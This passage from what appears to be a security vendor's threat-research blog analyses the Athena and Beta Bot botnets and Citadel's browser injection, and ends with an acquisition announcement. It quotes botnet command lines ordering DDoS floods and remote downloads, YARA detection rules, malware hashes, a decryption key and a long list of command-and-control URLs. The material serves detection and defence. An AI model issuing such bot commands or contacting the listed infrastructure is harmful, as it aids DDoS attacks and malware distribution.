  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

The server will use the string translation table sent by the bot on the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Without the original phone-home from the bot, this makes determining the commands sent by the cnc extremely difficult. The commands sent by the CnC are pipe-delimited with taskid=<task id> in the first part and then command=<command>  in the 2nd part.

The commands actually follow the exact same structure as the IRC version and the same parsing method is used once the command is extracted and some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels floating around on their CnCs which greatly sped up my reverse engineering of how the Athena HTTP binaries were operating. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation that I went through when recovering to readable PHP code:

The panel isn’t anything flashy, but is quite usable and shows the state of all bots and commands. I fired up an internal version of the control panel to experiment with and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This brings up the question of what is it used for? One of most popular uses that we have observed on the CnCs that we monitor is as a pay-per-install (PPI) botnet. Over the last 6 months, we have collected over 150 new executables by monitoring what URLs were told to be downloaded. A timeline graph is shown below, unlabeled yellow dots were samples that were  unidentified by our tagging system and also did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/LiteCoin/etc miners, while other were some password stealing applications. Apologies for the overlap on names, but it was extremely difficult to get them as non-overlapped as they are due to the high volume during a few short periods where people appeared to be testing out their new botnets :). The large gap in late August through early / October was due to a slight change in identification that caused our monitoring system to miss new samples and is not necessarily reflective of new malware not getting dropped.

Athena HTTP Dropped Malware Timeline

Athena HTTP Dropped Malware Timeline

 

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that look like  (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via mutex: search)  and additionally has many easily identifiable strings depending on the version. One such yara rule is presented below that catches many, but not all, versions of the IRC version and another rule that has so far detected all of the HTTP versions we have seen is also presented – these are also available in the Arbor Github repository. The Microsoft Security Essentials engine identifies the IRC and early versions of  Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.

 

rule athena_http{
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description= "Athena HTTP identification"
 strings:
   $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
 condition:
     all of ($fmt_str*) and 3 of ($cmd*)
}
rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}

Related MD5:

Athena IRC

3eb262817d8ab8a6f2282f0455c6ac03
859c2fec50ba1212dca9f00aa4a64ec4
0044e1e55b9524cc72b4060e5e84293d
cd962b1cfdfa6e3921adfc3750e95282
02214f425bf9c2c67d49e267bc4c84f6

Athena HTTP

2a8b26d216aea6fad8dd2297fd054413
e8bda57d4ca45cbe5d780a87e5052d0a
2d9f8082be96150b7f483ea5e863fcaa
7535a5ee124612cbaaf0e5a53b29158a
f1c083104fa4992e9f47a5b87e2c64f0

Beta Bot – A Code Review

By: Kenny MacDermid -

Introduction

The basics on Beta Bot was covered by Limor Kessem on the RSA blog. As a quick feature summary:

dHXoLtl

Unlike Mrs. Kessem’s conclusion, I wouldn’t classify Beta Bot as a banking trojan. To me it’s a banking trojan only in the same way a keylogger is a banking trojan. It does contain code to grab POSTed forms, but as the blog post mentions there’s no code to inject javascript into web pages, and nothing that would bypass a banks 2-factor authentication. Plus on the “Form grabber” configuration page is the warning: * Banking fraud is not condoned. We discourage you from committing any type of fraud with this feature. Who wouldn’t listen to that?

Beta Bot sales are being handled by “Lord Huron,” although “betamonkey” appears to be the author.

In this post, I hope to cover how Beta Bot uses encryption, how it stores its configuration, and provide a tool to extract it. The code is available in our GitHub repository and works with some raw files and memory dumps from Beta Bot versions 1.0.2.5 and 1.5.

Hashed APIs

Using hashes to hide the actual imports is a fairly common malware trick. Beta Bot uses the Aldr-32 (http://en.wikipedia.org/wiki/Adler-32) algorithm and hashes the: dll_name + "." + function_name.

api_hash

The DLL names are stored in the binary so it’s easy to iterate all the exports to create the hashes. The code links certain hashes to certain DLLs, but even without following the code you get only a couple of collisions, and it’s pretty clear which the correct function is.

Included in GitHub is a script to set the correct names for new samples.

Hidden Code

Beta Bot uses multiple layers of cryptography. The code that decrypts the configuration data is itself encrypted and stored in the binary. This hidden code is 550 bytes. The code verifies that the XOR of the last two bytes of the encrypted code is 0×63. It’s encrypted with RC4 using the hardcoded key 1E82B25C33.

This code is decrypted and started in a new thread with the address of the encrypted configuration and the encryption key passed in:

code

Using the crypto key the global configuration structure is decrypted using RC4 and pointers are set in the global main structure/class.

The inside_crypto_key is used to decrypt the configuration and is setup in the main global structure early in the bot setup. It points to a block of 32 bytes in the .data section. Inside the hidden code, every second byte is used to build the real key used to decrypt the encrypted configuration. The rest of the bytes appear unused.

key

Global_config_struct points to a block of encrypted data in the .rdata section. In version 1.0.2.5 of the code the length of a configuration is 0x2ace, in version 1.5 this has shrunk to 0xd46.

Configuration Structure Layout

Once decrypted, the configuration file contains a header with a unique ID of the purchaser of the bot, a couple of strings that are used for the rootkit install, and 16 CnC blocks.

Each CnC block contains a domain, path, and port, an option specifying if SSL should be used, the number of attempts that should be made, and the keys used for encrypting the communication. There are also checksum values, but I don’t plan to discuss them as to not make the creation of a builder too easy.

Configuration Extraction Tool

Located on Github is a script created to pull the encrypted configuration out of binaries or memory dumps. It works with version 1.0.2.5 and version 1.5 of Beta Bot using a couple of techniques to find the configuration. If the sample is packed with a packer that obfuscates either the .data or .rdata sections this tool will not work on the raw sample and memory dumps will have to be used.

For creating memory dumps, it’s useful to automatically create a dump on calls to LeaveCriticalSection. Beta Bot creates multiple threads and uses critical sections for synchronization. LeaveCriticalSection is called at the end of the decryption code.

r3shl4k1sh posted instructions can also be used to manually find the configuration data.

When the script finds a valid configuration it will output the information in the form:

output

Script search techniques:

Offset Search

First, the scripts search a small area of the .data and .rdata sections for valid key and configurations. This has shown to work well in our testing and is very fast, generally taking less than a second.

Bruteforce Search

Second, the script will create an index of all possible 6 byte sequences and search every possible key. The index requires memory of around 220 times the size of the file, and the amount of time required to search is also much larger. Searching a 1 meg file requires about 20 seconds to process.

Results

The script was run on available samples and 387 configs were found. The complete list with encryption keys is available here.

Owner URL
1337haxxor http://my-execute-1441.pw/index/order.php
136590144 http://virus-check.org/update/order.php
136590144 http://akamai-update.com/update/order.php
1427399 http://strike-file-hosting.us/b/order.php
1427399 http://gethostingfast.info/b/order.php
210259 http://beta.uandmearevideos1.com/direct/mail/order.php
210259 http://beta.thegamejuststarted15.com/direct/mail/order.php
210259 http://beta.thegamejuststarted12.com/direct/mail/order.php
210259 http://beta.thegamejuststarted10.com/direct/mail/order.php
210259 http://beta.mypaintdress.com/direct/mail/order.php
210259 http://beta.uandmearevideos2.com/direct/mail/order.php
210259 http://beta.stop2teaseme.com/direct/mail/order.php
210259 http://beta.pixartzone.com/direct/mail/order.php
210259 http://beta.dietmydart.com/direct/mail/order.php
210259 http://beta.worldwipeme.com/direct/mail/order.php
210259 http://beta.thegamejuststarted11.com/direct/mail/order.php
210259 http://beta.thegamejuststarted13.com/direct/mail/order.php
210259 http://beta.thegamejuststarted14.com/direct/mail/order.php
792476 http://7obby.com/beta/order.php
792476 http://betabot.zapto.org/beta/order.php
792476 http://betabu.zapto.org/beta/order.php
Deamons http://www.evaluatedservices.biz/services/order.php
Deamons http://evaluatedservices.no-ip.org/services/order.php
Deamons http://gamerslaunch.no-ip.org/services/order.php
Eleventy One http://pooo-network.ru/register/order.php
Eleventy One http://poooman.tk/register/order.php
Eleventy One http://CUCUMBERS.TK/register/order.php
Eleventy One http://SAMSUNGGALAXYS3.TK/register/order.php
KWA http://haveityourway.pw/members/order.php
KWA http://thebestway42.pw/members/order.php
KWA http://itsoktohaveityourway.com/members/order.php
KWA http://losmejoresburgars1.com/members/order.php
Marvid http://betabros.in/beta/order.php
TSWR http://kankarmz.ru/Duf67/H8938_827.php
TSWR http://u023sjasj.net/Duf67/H8938_827.php
TSWR http://iodijsakj.net/Duf67/H8938_827.php
antonstrato http://terraload.pw/bb/order.php
antonstrato http://trakd.ws/bb/order.php
antonstrato http://trakd.biz/bb/order.php
antonstrato http://trakd.ru/bb/order.php
bd http://nicolozzi.com/order.php
bd http://marlinators.com/order.php
bd http://aberdolli.com/order.php
bd http://markupont.com/order.php
bd http://coloranders.com/order.php
bdatblackhat http://dietfitnessliving.com:8088/order.php
bdatblackhat http://strandotline.net:8088/order.php
bdatblackhat http://abilfindgone.net:8088/order.php
bdatblackhat http://morgentallen.com:8088/order.php
bdatblackhat http://langlots.com:8088/order.php
blacklabel http://premium-load.com/primetime/order.php
blacklabel http://weed-service.biz/primetime/order.php
blacklabel http://premium-load.biz/primetime/order.php
blacklabel http://load1337.biz/primetime/order.php
blacklabel http://loads1337.biz/primetime/order.php
blacklabel http://weed-service.biz/primetime/order.php
blacklabel http://deception.cc/primetime/order.php
blacklabel http://fullstream.in/primetime/order.php
blacklabel http://mystream.in/primetime/order.php
blacklabel http://premium-movie.ru/primetime/order.php
bmblender33 http://assler.hfgfr56745fg.com/cakes/sale.php
boog http://1rb4hiu.name/path/order.php
boog http://2snrgk3.name/path/order.php
boog http://ekyn6w.name/path/order.php
boog http://ylen5d87.biz/path/order.php
boog http://y4d5g1v.biz/path/order.php
boog http://8y14gf5s.biz/path/order.php
caerus http://knwns.de/bst/order.php
caerus http://dspas.de/bst/order.php
caerus http://oscos.de/bst/order.php
cobraxxx http://firecrypt.net/BetaBot/order.php
cobraxxx http://rankedgaming.co/BetaBot/order.php
cobraxxx http://iphone5-giveaways.com/BetaBot/order.php
d8902659 http://n18b7273u1j.in/M_jsh1/order.php
d8902659 http://b19jdn167t.in/M_jsh1/order.php
dan http://umadais.pw/a/order.php
dan http://yyaammppuu.pw/a/order.php
dan http://blamaldo.pw/a/order.php
depojones http://uy56icv89178.net/warm/order.php
detodo http://medievaltime.rhodes-rhodes.com/webcalendar/revenew.php
detodo http://vacation.eurotrip-06.com/webcalendar/revenew.php
detodo http://eurotrip.e-greecetravel.com/webcalendar/revenew.php
detodo http://playgames.cyprusleague.com/webcalendar/revenew.php
euroroids http://steroids-buy-anabolic.com/order.php
h4r3 http://dev-prism.su/prism/return.php
h4r3 http://lavidalocapd.biz/~.chica/analytics.php
h4r3 http://tktlamifa.co.in/~.alah/analytics.php
h4r3 http://whatdaaafuckinyourhead.biz/~.zbra/analytics.php
h4r3 http://x42v72.biz/~.nazi/analytics.php
h4r3 http://zbraaadanstfesse.org/~.poto/analytics.php
h4r3 http://suxme.itsprosolutions.org/~.juif/analytics.php
h4r3 http://suxme.itsprosolutions.org/~.boobi/analytics.php
h4r3 http://allahwouakbaaahhh.co.in/~.boby/analytics.php
h4r3 http://namesbeyond.ru/dns/return.php
h4r3 http://amemeuch.biz/~.xixu/analytics.php
h4r3 http://justinbkt.su/ppl/return.php
h4r3 http://betazbraxxx.co.in/~.oula/analytics.php
h4r3 http://gangbangonexposedbotnet.su/love/return.php
h4r3 http://hackattaksuceuse.biz/~.homo/analytics.php
h4r3 http://hacktipucov2.org/~.xixu/analytics.php
h4r3 http://jesaispastropkoimettre.org/~.jesus/analytics.php
h4r3 http://laradimcrelou.co.in/~.sarko/analytics.php
h4r3 http://thebossinfly.org/~.xixu/analytics.php
infin219235 http://jkdef6.ws/papka/order.php
infin219235 http://jkdef8.ws/papka/order.php
infin219235 http://jkdef6.ws/papka/order.php
infin219235 http://jkdef8.ws/papka/order.php
infin219235 http://jkdef7.ws/papka/order.php
infin219235 http://jkdef10.ru/papka/order.php
infin219235 http://jkdef11.ru/papka/order.php
infin219235 http://jkdef12.ru/papka/order.php
infinity http://betabros.in/b/order.php
infinity http://jkdef9.ws/papka/order.php
infinity http://betabros.asia/b/order.php
infinity http://jkdef8.ws/papka/order.php
infinity http://jkdef7.ws/papka/order.php
infinity http://jkdef6.ws/papka/order.php
jmr21900f8 http://euclid.es/147/order.php
juancarlos http://s5.6d6f6e65797072696e746572.com/wp-admin/order.php
juancarlos http://wyomiriding928.com/wp-admin/order.php
juancarlos http://portal.anzima.eu/wp-admin/order.php
juancarlos http://ripraktec147.com/wp-admin/order.php
juancarlos http://portal.jaymad.net/wp-admin/order.php
juancarlos http://youdbeproud228.com/wp-admin/order.php
juancarlos http://wyomiriding928.com/wp-admin/order.php
kakaatthesec http://obession.co.ua/wordpress/images/order.php
kakaatthesec http://harmonia2011.info/wordpress/images/order.php
kakaatthesec http://fasdkj234fffdcsfsdac.info/wordpress/images/order.php
kakaatthesec http://ringostars.info/wordpress/images/order.php
kakaatthesec http://asdffdssfadtged3432ff.info/wordpress/images/order.php
kakaatthesec http://dfsajkhkjfhdsjfsdf32fdscc.info/wordpress/images/order.php
kakaatthesec http://jkfadshjsmafweior32fsyfsdc.info/wordpress/images/order.php
kakaatthesec http://oppnetter.biz.ua/wordpress/images/order.php
kakaatthesec http://hot.zlatkotrpkovski.net/wordpress/images/order.php
kakaatthesec http://oppspeedy.co.ua/wordpress/images/order.php
kakaatthesec http://tommyslav.name/wordpress/images/order.php
kakaatthesec http://oppnetspeed.co.ua/wordpress/images/order.php
kakaatthesec http://polen.pelota.so/wordpress/images/order.php
kakaatthesec http://antczakphotos.info/wordpress/images/order.php
kakaatthesec http://digues.info/wordpress/images/order.php
katokiyomasa http://www4.cdljussarago.com.br/js/dojo/order.php
katokiyomasa http://www4.tamareirashotelmg.com.br/js/dojo/order.php
kulira2 http://m0ap9s1n0.com/0r/r0/ba/order.php
kulira2 http://x01rakmtp.com/0r/r0/ba/order.php
kulira2 http://uj8kml21z.com/0r/r0/ba/order.php
lavnesh http://freegamebox.us/codeserver/order.php
lavnesh http://lpa4u.in/radioserver/order.php
lavnesh http://gamingplanet.us/codeserver/order.php
marvid82 http://betabros.in/b/order.php
mr7xa2a http://hackedthe.biz/beta/order.php
mrwhite http://botsworkingnets.net/panel15/order.php
neepro http://wutido.su/manager/order.php
neepro http://wutudo.su/manager/order.php
nicksasa http://imafaggot.pw/service/order.php
nicksasa http://winblowservice.hopto.org/service/order.php
nicksasa http://imtheop.redirectme.net/service/order.php
prince896589 http://derp.ws/img/order.php
r3dspid3r http://securityspecialiastinc.in/phpmiadmin/order.php
r3dspid3r http://securityspecialiastinc.in:7777/phpmiadmin/order.php
ryanc http://imgay.ddos.cat/h/order.php
ryanc http://imgay.ddos.es/h/order.php
ryanc http://imgay.theswat.net/h/order.php
scarpa http://blackcross.me/burocracia/inicio.php
scarpa http://branigan.me/burocracia/inicio.php
shrooms http://msn.3utilities.com:81/help/order.php
shrooms http://videoparadise.biz:81/help/order.php
shrooms http://kittybook.biz:81/help/order.php
shrooms http://msn1981.3utilities.com:81/help/order.php
shrooms http://DATES4YOU.TK:81/help/order.php
solid006 http://dirtybagmcgee.com/dirty/order.php
solid006 http://silverxchagr.com/juice/order.php
solid006 http://shoremasse.mobi/popp/order.php
solid006 http://bicycletrainers.info/wheellock/order.php
solid006 http://goldlimiter.biz/hum/order.php
solid006 http://royalgcs.biz/slam/order.php
solid006 http://womenhealthbody.pw/diet/order.php
solid006 http://gaspaces.com/cats/order.php
solid006 http://dealthos.pw/crap/order.php
solid006 http://diccwadz.pw/slap/order.php
solid006 http://jeanmagik.org/hats/order.php
solid006 http://dreambasqet.biz/sill/order.php
solid006 http://prtctrl.us/popp/order.php
spankdahobo http://alfalocagames.in/forums/order.php
spankdahobo http://whyapplemac.com/forums/order.php
spankdahobo http://nosurvivor.com/forums/order.php
sphinx http://yuant.org/sor/order.php
sphinx http://rankpae.info/sor/order.php
sphinx http://yuant.org/sor/order.php
ss9s9s9s4d http://securityspecialiastinc.in/phpmiadmin/order.php
stringback http://fuckencio.com/wordpress/order.php
stringback http://clarocontigosiempre.mobi/wordpress/order.php
stringback http://clarocontigosiempre.us/wordpress/order.php
the sky daddy http://sentryme.com/order.php
the sky daddy http://smokelessbooter.tk/bronk/order.php
the sky daddy http://stayattentive.com/order.php
the sky daddy http://watchonlinecams.com/bronk/order.php
the sky daddy http://ssh-products.com/bronk/order.php
the sky daddy http://fudfiles.com/bronk/order.php
the sky daddy http://theprofitnet.com/bronk/order.php
the sky daddy http://1337hackers.com/bronk/order.php
the sky daddy http://cash-networks.com/bronk/order.php
thesilence http://wrightfeldhusen.info/beta/order.php
thesilence http://futureofwebdesign.info/beta/order.php
thesilence http://vdezignstudio.info/beta/order.php
thesilence http://waterworks2.info/beta/order.php
thesilence http://waterworks2.com/beta/order.php
thesilence http://nordkupp1.info/beta/order.php
thesilence http://circusbum.info/beta/order.php
thesilence http://novflex.info/beta/order.php
thesilence http://akwebdesigner.info/beta/order.php
thesilence http://websachee.info/beta/order.php
thesilence http://tincorporated.info/beta/order.php
thesilence http://thetwenty.info/beta/order.php
thesilence http://swedishseasons.info/beta/order.php
thesilence http://lommebags.info/beta/order.php
thesilence http://andywilsonfs.info/beta/order.php
thesilence http://ghostgames1.info/beta/order.php
toxbotatjab http://kemasonlogs.com/admin/order.php
toxbotatjab http://milleniumforum.net/system/order.php
toxbotatjab http://skywalke.com/forum/order.php
toxbotatjab http://letmein2.com/foro/order.php
toxbotatjab http://milleniumboard.tk/logs/order.php
toxbotatjab http://tecnoservice.tk/test/order.php
untraceable http://adobe-update.com/flash_player/order.php
untraceable http://auto-update.net/flash_player/order.php
volwy http://Tr0j3n18.info/order.php
volwy http://ASKFMHILELERI.COM/order.php
volwy http://KINGFB.COM/order.php
volwy http://MO843TI943ZT7842R23R23.COM/order.php
xafx http://srv1.su/b/order.php
xversial http://seattleschools.co/beta/order.php
xversial http://:modbrandom.net/order.php
xversial http://sxyza.dyndns.ws/beta/order.php
xversial http://shatteredwow.com/beta/order.php
xversial http://cnetwork.eltsa.com/beta/order.php
xversial http://thex-net.com/pnetb1z/order.php
zaber http://beta.uandmearevideos1.com/direct/mail/order.php
zaber http://beta.thegamejuststarted15.com/direct/mail/order.php
zaber http://beta.thegamejuststarted12.com/direct/mail/order.php
zaber http://beta.thegamejuststarted10.com/direct/mail/order.php
zaber http://beta.mypaintdress.com/direct/mail/order.php
zaber http://beta.uandmearevideos2.com/direct/mail/order.php
zaber http://beta.stop2teaseme.com/direct/mail/order.php
zaber http://beta.pixartzone.com/direct/mail/order.php
zaber http://beta.dietmydart.com/direct/mail/order.php
zaber http://beta.worldwipeme.com/direct/mail/order.php
zaber http://beta.thegamejuststarted11.com/direct/mail/order.php
zaber http://beta.thegamejuststarted13.com/direct/mail/order.php
zaber http://beta.thegamejuststarted14.com/direct/mail/order.php
zero byte http://www.w0000t.com/000003/order.php
zero byte http://www.modmarkgoldshop.com/000003/order.php
zero byte http://www.mogains.com/000003/order.php
zerod30_1111 http://www.w0000t.com/000003/order.php
zerod30_1111 http://www.modmarkgoldshop.com/000003/order.php
zerod30_1111 http://www.mogains.com/000003/order.php
e4d56fhhu http://h1gh.to/content/design/in/images/ads/banner/order.php
e4d56fhhu http://vbt-one.biz/content/design/in/images/ads/banner/order.php
e4d56fhhu http://chf-dfgsdfgplace.net/content/design/in/images/ads/banner/order.php
e4d56fhhu http://ded-rrwqwzjzjris.com/content/design/in/images/ads/banner/order.php
e4d56fhhu http://seb-api.net/content/design/in/images/ads/banner/order.php
e4d56fhhu http://swrgfderthgikhoplk.info/content/design/in/images/ads/banner/order.php
e4d56fhhu http://cf-fgdgwdvbs.com/content/design/in/images/ads/banner/order.php
e4d56fhhu http://greahthrhdhse.info/content/design/in/images/ads/banner/order.php
e4d56fhhu http://sab-rehrgfgdfg.org/content/design/in/images/ads/banner/order.php
caerus http://knwns.de/bst/order.php
caerus http://dspas.de/bst/order.php
caerus http://oscos.de/bst/order.php

Citadel’s Man-in-the-Firefox: An Implementation Walk-Through

By: Dennis Schwarz -

While banking malware or “bankers” have a lot of functionality, they are defined by their Man-in-the-Browser (MITB) implementation. This mechanism allows them to not only steal banking usernames and passwords, but to also inject arbitrary content into banking websites in order to social engineer and try and steal additional credentials such as identifying information, pins, and token codes.

The paper below will walk through Citadel’s MITB implementation for the Firefox web browser. Citadel was chosen as the malware of interest because at the time of writing it was one of the main banking trojans being used in the wild. Even after Microsoft’s Operation b54 which took down more than 1,400 Citadel botnets, the malware is alive and well and being used by distinct threat actors to target various countries and their associated financial sectors. The focus will be on Firefox because it is an easier target to walk through, but the concepts can be extrapolated to (and have been implemented for) other browsers–Internet Explorer, Opera, and some versions of Chrome.

Since its arrival sometime in early 2012, there has been a lot of good analysis on Citadel as a whole, but they don’t venture very deeply into the MITB functionality. Likewise, there have been a lot of good write-ups and proof of concept code for MITB techniques, but they have usually stopped short of showing in the wild, malicious implementations. The goal of this paper is to help bridge that gap.

More specifically, this paper shows how Citadel modifies a benign banking website like this:

citadel_mitb1to a malicious version:

citadel_mitb2so that they can harvest banking credentials from innocent victims:

citadel_mitb3Techniques like MITB are making “bankers” incredibly deft at their craft; infecting and affecting a large number of people and companies across the world. The more that these tactics are understood, the better they can be protected against.

For the full white paper (PDF) please click here.

 

Taking on the biggest challenges and welcoming Packetloop

By: klamb -

From our founding more than a dozen years ago, Arbor has studied network traffic. We started as a research project at the University of Michigan, looking at routing instability on large distributed networks. This led from monitoring network traffic, and modeling it, to identifying anomalies related to DDoS attacks. With that, Arbor Networks was commercialized and the concept of wide-scale network behavior analysis was born.

In that time, everything about DDoS has changed. What was once dismissed as a basic attack, or service provider problem, is now a complex, multi-vector threat targeting enterprises. Arbor co-founder Rob Malan tells a great story that sums this up perfectly,

“I remember meeting with a VC back in October or November of 2001 on Sand Hill Road with Farnam…He sneered at us, told us that denial-of-service was a fad that had passed, and that we’d be out of business within six months. It turns out that his firm is the one that no longer exists.”

Just last week, SC Magazine reported that Three banks plundered with DDoS distraction. An application-layer DDoS attack was used to divert the attention and resources of banks away from fraudulent wire transfers simultaneously occurring. This is by no means unique. Multi-vector attacks combine malware, flooding, application and state exhaustion attacks against infrastructure devices all in a single, sustained attack.

No matter how much the threats, and attackers, have changed, security still all comes down to traffic, seeing it, studying it, understanding it, and ultimately leveraging that understanding to deliver powerful analytics that allow defenders to protect their infrastructure and assets in new transformative ways.

With that last sentence in mind, I couldn’t be more excited about Arbor Networks acquisition of Packetloop. Simply put, Packetloop will enable Arbor to leverage our unprecedented visibility and understanding of the network to deliver powerful and transformative analytics and protection capabilities to our customers and the security market.

Why Packetloop? It comes down to four things: people, technology, vision and customers.

First, let’s talk about the people. We at Arbor pride ourselves on having an amazing company culture that is all about employing the best, brightest and most motivated people who are committed to collaboration and problem solving. I truly believe that this has probably been the biggest reason behind our sustained success over the years. When we met and got to know the team at Packetloop, we immediately recognized they brought this same passion and commitment to their work. We also quickly recognized they were the best and brightest when it came to the area of big data, security analytics and bringing disruptive and transformative technologies to market. We knew straight away that we wanted them to be a part of the team at Arbor, and thankfully, they felt the same way.

Packetloop has a set of technologies that address some very difficult security problems that have been and continue to keep customers up at night. They’ve developed a powerful decision making platform that brings context to massive amounts of data that can paralyze security teams.

With Packetloop, Arbor is in a unique an enviable position to deliver a network-based, full spectrum security visibility, detection, mitigation and analytics platform that can scale to terabytes and petabytes of both real-time and retrospective security data.

Like Arbor, Packetloop has a well thought out and innovative vision for the problems they want to solve, approaches for solving them, and the near term plans to execute and make these solutions a reality. In short, like Arbor, Packetloop gravitated toward the hard problems and the innovative solutions that truly deliver as promised.

Finally and most importantly, Packetloop knows how important the customer is, and they want nothing more than to deliver solutions that do what they are supposed to do, deliver meaningful customer value and demonstrate an obvious and demonstrable return on investment in the eyes of users. Like Arbor, they put the customer first, partner with them and help them solve their toughest security challenges.

We are ecstatic to welcome Scott, Michael, Tyson and the rest of the Packetloop team to Arbor. Combining Arbor’s scale, complementing technology, network security DNA with Packetloop’s next generation security analytics platform and big data pedigree is an obvious win for us. Everyone at Arbor is excited and energized. This is a great development for Arbor, our customers and the security marketplace in general. And you don’t just have to take my word for it; you will get to see for yourselves shortly :)

Go Back In Time →